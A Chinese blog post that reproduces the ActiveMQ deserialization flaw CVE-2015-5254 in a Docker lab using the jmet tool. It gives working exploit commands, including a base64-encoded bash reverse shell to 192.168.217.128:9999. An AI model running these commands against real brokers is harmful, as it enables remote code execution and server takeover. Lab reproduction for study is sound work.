Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现

CVE-2016-3088

一、环境搭建

Java:jdk8
影响版本 Apache ActiveMQ < 5.13.0

二、用docker搭建漏洞环境

访问一下web界面

然后进入admin目录登录

账号:admin

密码:admin

三、工具准备

  1. cd /opt

  2. wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

  3. mkdir external

注意:一定要下载external,否则会报错

四、测试漏洞存在

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 8.210.152.234(靶机IP,下图说是自己的ip是错误的) 61616

点击触发命令执行

查看一下目录,发现创建成功

五、getshell

首先借用一个网站对payload进行处理,网址我以前的文章复现有提到。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvOTk5OSAwPiYxIA==}|{base64,-d}|{bash,-i}" 192.168.217.128 61616

最后点击它,触发命令执行

如上图所示即反弹shell成功!

相关推荐
乐之者v5 分钟前
使用 Lens连接阿里云k8s集群
java·阿里云·kubernetes
迎風吹頭髮39 分钟前
UNIX下C语言编程与实践16-UNIX 磁盘空间划分:引导块、超级块、i 节点区、数据区的功能解析
java·c语言·unix
程序员小假1 小时前
线程池执行过程中遇到异常该怎么办?
java·后端
稚辉君.MCA_P8_Java1 小时前
DeepSeek Java 单例模式详解
java·spring boot·微服务·单例模式·kubernetes
洛_尘1 小时前
数据结构--4:栈和队列
java·数据结构·算法
疯癫的老码农1 小时前
【小白入门docker】创建Spring Boot Hello World应用制作Docker镜像并运行
java·spring boot·分布式·docker·微服务
Mr.Entropy1 小时前
Hibernate批量查询方法全面解析
java·后端·hibernate
绝顶少年2 小时前
Spring 框架中 RestTemplate 的使用方法
java·后端·spring
小趴菜82272 小时前
安卓人机验证View
android·java·前端
观望过往2 小时前
【Java SE 运算符】全面解析与实践指南
java